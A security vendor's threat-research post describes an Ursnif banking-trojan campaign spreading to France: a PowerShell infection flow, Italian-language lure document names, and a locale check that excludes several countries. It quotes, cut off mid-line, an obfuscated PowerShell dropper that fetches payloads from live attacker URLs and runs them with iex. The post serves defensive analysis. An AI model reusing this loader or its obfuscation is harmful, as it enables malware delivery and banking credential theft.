Cynet’s team of security analysts and threat researchers have uncovered a new wave of attacks, targeting organizations with the Ursnif banking trojan. While previous attacks have focused on Italian organizations, this wave introduces expansion to Central Europe as well. The findings reveal that a great deal of thought was invested in the campaign’s success and scope – this indicates that what we found is just the tip of the iceberg and there’s probably more coming our way.

Spreading Beyond Italy

We discovered attempts to compromise organizations in France. Here is a sample flow similar to the ones we encountered in Italy:

  1. WMI process executes a highly obfuscated PowerShell command.
  2. After de-obfuscating the PowerShell command, it checks whether the infected host is set to Central EU time zone (GMT+01:00).
  3. If the host has the required localization setting, the malicious command attempts to download an image (using invoke-PSImage) from the following URLs: hxxps://images2.imgbox[.]com/09/b4/LZ67KpcK_o[.]png ,hxxps://i.imgur[.]com/TVkWKQa[.]png.
  4. Once the host initiates communication with the above-mentioned URLs, an image containing a malicious code is downloaded.

5. The image contains an encoded malicious command that is trying to download the Ursnif payload to the following path: appdata\local\temp\ path.

A Wide Array of Socially Engineered Word Doc Variations

Similar to previous Ursnif trends, the malware is delivered via a socially engineered email containing a weaponized Word document that includes a malicious Macro.

We’ve identified several version of the document, apparently tailored per the target’s region:

Example 1:

“C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE” /n “C:\Users\lettirobe1\AppData\Local\Temp\Temp1_Fatturazione_Elettronica__invio_copia__653466.zip\Fatturazione_Elettronica__invio_copia__940122.docm” /o “”

 

Example 2: Tribunale_di_Napoli__Procedura_esecutiva_immobiliare_490323.docm

 

Example 3: INDIRIZZO CESS FACTOR NS MAIL PEC.docx

 

This indicates a well established infrastructure. Clearly the attackers have invested resources to validate success, rather than merely mass propagate a single, generic message to all victims.

Exclusion of China, Russia, Ukraine and Belarus

An interesting feature in this strain is that while earlier variants specifically looked for Italian companies, this strain is much broader. In fact, it performs a check to exclude Russia, China, Ukraine and Belarus:

 

“C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe” if( (GetUICulture).NamematchRU|UA|BY|CN‘){ exit; };$hfbtdig = [System.IO.Path]::GetTempPath();$zwdhvawuzdwfexvjthsufa = Join-Path $hfbtdig ‘SearchI32.txt’;$jfcdysvetdtzafwyjxv=’http://salsa.recluta.in/cryptbody2.php’;$zjdxjuttibudhajccxsgf = Join-Path $hfbtdig ‘SearchI32.js’;$ithsvezwftdcvdxbcjwaxehcd=’http://salsa.recluta.in/loadercrypt_823EF8A810513A4071485C36DDAD4CC3.php’;$hjecgzuyywvdswdgzadvz = ”;$auziwsvjbfjcjtcbcsxxvwc='(NewB6xEETa-B6xEETaObject Net.WB6xEETaebCB6xEETalienB6xEETat)B6xEETa.DownloB6xEETaadFile($jB6xEETafB6xEETacdysB6xEETavetB6xEETadtzafB6xEETawyB6xEETajxB6xEETavB6xEETa,$zwdhvawuzdwfexvjthsufa)B6xEETa;B6xEETa’ -replace ‘B6xEETa’,”;iex $auziwsvjbfjcjtcbcsxxvwc;$ddzesyhitysxuxcj='(New-Obje6Et86uWct Net.6Et86uWWebCl6Et86uWie6Et86uWn6Et86uWt).Down6Et86uWloa6Et86uWd6Et86uWFile(6Et86uW$iths6Et86uWve6Et86uWzw6Et86uWft6Et86uWdcvdxbcjwax6Et86uWehcd6Et86uW,$zjdxju6Et86uWttibudhajcc6Et86uWxsgf);’ -replace ‘6Et86uW’,”;iex $ddzesyhitysxuxcj;Get-Content $zwdhvawuzdwfexvjthsufa | Where-Object {$_ -match $regex} | ForEach-Object { $hjecgzuyywvdswdgzadvz += $_ -r

Conclusion

Our findings indicate a highly active and dynamic campaign. We’ll keep on monitoring it for future developments and update accordingly.